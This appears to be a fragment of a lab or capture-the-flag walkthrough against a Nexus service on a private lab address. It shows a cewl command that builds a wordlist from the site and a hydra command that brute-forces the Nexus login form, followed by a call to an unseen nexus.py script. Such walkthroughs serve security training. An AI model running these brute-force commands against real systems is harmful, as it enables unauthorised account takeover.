8081

Now we can create a custom wordlist:

cewl http://192.168.227.61:8081/ --lowercase | grep -v CeWL > custom-wordlist.txt

Now we can use hydra to bruteforce:

hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.227.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
python3 nexus.py

Last updated